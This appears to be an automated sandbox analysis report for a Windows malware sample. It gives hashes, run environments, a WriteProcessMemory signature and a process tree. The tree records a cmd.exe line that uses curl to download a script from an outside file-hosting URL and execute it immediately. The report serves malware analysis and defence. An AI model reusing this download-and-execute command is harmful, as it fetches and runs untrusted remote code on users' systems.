Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
17/11/2023, 10:55
Static task
static1
Behavioral task
behavioral1
Sample
10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe
Resource
win10v2004-20231023-en
General
-
Target
10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe
-
Size
1.9MB
-
MD5
49224dedd631dcb90428829dfcb6d4b7
-
SHA1
6bf03412f2814ed09a0040aa80a3a5b1a4357c74
-
SHA256
10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13
-
SHA512
7dd9e1132b3410b6bd0b8bf0172ceac91b27269fb5185172353a1bde8a9f6b3c5b5fbf094c2088972ebccd5fa233ed0de9b06c59d538f4005977a3f04b548e65
-
SSDEEP
24576:p2masH62sgIUxGVmLHrrCve4D+Ec0xMkH8JsU3Ao7qqIpWsRb3:AmasH6eIUxGere24yqqIpWsRb3
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2964 wrote to memory of 2372 2964 10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe 29 PID 2964 wrote to memory of 2372 2964 10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe 29 PID 2964 wrote to memory of 2372 2964 10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe 29 PID 2372 wrote to memory of 2192 2372 cmd.exe 30 PID 2372 wrote to memory of 2192 2372 cmd.exe 30 PID 2372 wrote to memory of 2192 2372 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe"C:\Users\Admin\AppData\Local\Temp\10575058363bd543923cbdb159a49fadf732361edf4f69de6e075394d81c6d13.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://vip.123pan.cn/1814328088/gtx/2 -o %HOMEPATH%\2.cmd&%HOMEPATH%\2.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\cmd.execmd /c "curl https://vip.123pan.cn/1814328088/gtx/2 -o \Users\Admin\2.cmd&\Users\Admin\2.cmd"3⤵PID:2192
-
-